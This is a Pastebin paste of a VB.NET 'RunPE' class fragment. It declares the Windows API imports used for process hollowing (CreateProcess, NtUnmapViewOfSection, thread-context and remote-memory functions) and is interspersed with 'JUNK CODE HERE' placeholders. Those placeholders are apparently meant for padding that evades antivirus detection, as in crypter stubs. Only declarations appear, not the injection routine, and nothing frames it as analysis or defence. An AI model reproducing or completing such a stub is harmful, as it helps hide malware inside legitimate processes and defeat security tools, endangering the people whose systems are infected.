Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 23.Public Class RunPE
- JUNK CODE HERE
- 24. <DllImport("kernel32")> _
- 25. Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As System.Text.StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
- JUNK CODE HERE
- 26. ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
- 27. End Function
- JUNK CODE HERE
- 28. <DllImport("kernel32")> _
- 29. Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
- 30. End Function
- JUNK CODE HERE
- 31. <DllImport("ntdll")> _
- 32. Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
- 33. End Function
- JUNK CODE HERE
- 34. <DllImport("kernel32")> _
- 35. Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
- 36. End Function
- 37. <DllImport("kernel32.dll")> _
- 38. Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
- 39. End Function
- 40. <DllImport("kernel32")> _
- 41. Private Shared Function SetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
- 42. End Function
- JUNK CODE HERE
- 43. <DllImport("kernel32")> _
- 44. Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
- 45. End Function
- JUNK CODE HERE
- 46. <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
- 47. Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
- 48. End Function
- JUNK CODE HERE
- 49. <DllImport("kernel32.dll", SetLastError:=True)> _
- 50. Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
- 51. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement